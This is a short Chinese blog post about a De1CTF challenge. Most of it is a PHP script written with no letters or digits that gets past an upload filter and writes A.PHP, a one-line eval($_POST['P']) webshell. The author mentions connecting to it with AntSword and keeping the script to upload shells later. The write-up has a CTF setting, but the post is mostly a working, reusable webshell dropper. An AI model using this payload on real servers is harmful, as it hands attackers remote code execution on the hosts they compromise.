记一个过滤字母数字异或取反等操作写shell的php脚本
前几天的De1CTF有一个过滤了字母数字异或取反等运算的题,第一步就是上传一个脚本
上传脚本只是第一步,访问生成A.PHP写一个小马,然后就可以蚁剑连接,但是之后就没思路了,看了大佬们的wp是真的跪了,这里单纯记录一个脚本,一开始写的洋洋洒洒超过了2048个字符,后面老老实实的做优化,这里删掉换行还能精简,为了代码展示效果就保留了
旁边写了对应的字符,实际上传过程是需要删去的,可以说是很精简了,自己保留一下以后说不定传shell还能用
<?=$_=[]?>
<?=$_="$_"?>
<?=$_=$_["!"!="!"]?>
<?=$__=$_?><?="A"?>
<?=++$_?>
<?=$__________=++$_?><?="C"?>
<?=++$_?>
<?=$_____=++$_?><?="E"?>
<?=$___________=++$_?><?="F"?>
<?=++$_?>
<?=$____________=++$_?><?="H"?>
<?=$_____________=++$_?><?="I"?>
<?=++$_?>
<?=++$_?>
<?=$_______=++$_?><?="L"?>
<?=++$_?>
<?=$________=++$_?><?="N"?>
<?=$_________=++$_?><?="O"?>
<?=$___=++$_?><?="P"?>
<?=++$_?>
<?=++$_?>
<?=$______=++$_?><?="S"?>
<?=$____=++$_?><?="T"?>
<?=$______________=++$_?><?="U"?>
<?=$_______________=++$_?><?="V"?>
<?=$________________=$___________.$_____________.$_______.$_____."_".$___.$______________.$____."_".$__________.$_________.$________.$____.$_____.$________.$____.$______?>
<?=$_________________="<?=".$_____.$_______________.$__.$_______."($"."_".$___.$_________.$______.$____."['".$___."'])"."?>" ?>
<?=$________________($__.".".$___.$____________.$___,$_________________)?>
<?='file_put_contents("A.PHP", "<?=eval(" . "$" . "_POST[P])?>")'?>